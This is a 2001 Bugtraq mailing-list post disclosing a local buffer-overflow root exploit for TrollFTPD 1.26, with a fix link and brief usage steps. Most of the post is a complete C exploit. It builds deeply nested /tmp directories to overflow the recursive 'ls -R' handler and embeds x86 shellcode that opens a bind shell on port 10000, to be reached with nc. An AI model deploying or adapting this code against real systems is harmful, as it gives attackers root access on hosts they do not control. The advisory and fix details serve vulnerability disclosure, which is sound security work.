From: zen-parse <zen-parse@gmx.net> To: <bugtraq@securityfocus.com> Subject: Local exploit for TrollFTPD-1.26 Date: Mon, 13 Aug 2001 15:22:22 +1200 (NZST) Affects: TrollFTPD 1.26 (probably earlier) Severity: local users can gain root access. Fix: upgrade to TrollFTPD-1.27 Fix URL: ftp://ftp.trolltech.com/freebies/ftpd/troll-ftpd-1.27.tar.gz Description: An error in the handling of recursive directory listings can result in an exploitable buffer overflow. Exploit: (offsets are for one machine. not guaranteed to work on any others.) Run the program, ftp localhost <in ftp> (your username) (your password) cd /tmp ls -R <out of ftp> Connect to port 10000 with nc Be nice. -- zen-parse -- ------------------------------------------------------------------------- The preceding information, unless directly posted by zen-parse@gmx.net to an open forum is confidential information and not to be distributed (without explicit permission being given by zen-parse@gmx.net). Legal action may be taken to enforce this. If you are mum or dad, this probably doesn't apply to you. char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx "\xb0\x66" // mov al, 102 "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x4b" // dec ebx "\xcd\x80" // int 80h "\x89\xc7" // mov edi, eax "\x52" // push edx "\x66\x68\x27\x10" // push word 4135 "\x43" // inc ebx "\x66\x53" // push bx "\x89\xe1" // mov ecx, esp "\xb0\x10" // mov al, 16 "\x50" // push eax "\x51" // push ecx "\x57" // push edi "\x89\xe1" // mov ecx, esp "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\xb0\x66" // mov al, 102 "\xb3\x04" // mov bl, 4 "\xcd\x80" // int 80h "\x50" // push eax "\x50" // push eax "\x57" // push edi "\x89\xe1" // mov ecx, esp "\x43" // inc ebx "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\x89\xd9" // mov ecx, ebx "\x89\xc3" // mov ebx, eax "\xb0\x3f" // mov al, 63 "\x49" // dec ecx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf8" // loop lp "\x51" // push ecx "\x68\x55\x55\x55\x55" // push dword 68732f6eh "\x68\x55\x55\x55\x55" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\x0b" // mov al, 11 "\xcd\x80"; // int 80h main() { char dir[8000]; char nir[8000]; int z0=0,a0=0x080597f8; int z1=0,a1=0xbff96450; int g; strcpy(dir,"/tmp/retroll/"); mkdir(dir,0777); printf("%d\n",strlen(shellcode)); while(strlen(dir)<4040) { strcat(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"); mkdir(dir,0777); } // 4048 so far leaving 48 left. if(chdir(dir)){perror("chdir");exit(1);} printf("%d + ",strlen(dir)); sprintf(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"); mkdir(dir,0777); system("cp /bin/sh AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/UUUUUUUU"); sprintf(nir,"%sAAAAAAAAAAAAAAAAAAAAAAAA",dir); sprintf(dir,"%sGGGG=AAAAAAA%sAAAAAAAAAAAA%sCCCC%s",nir,&a0,&a1,shellcode); printf("%d = ",strlen(dir)); mkdir(dir,0777); }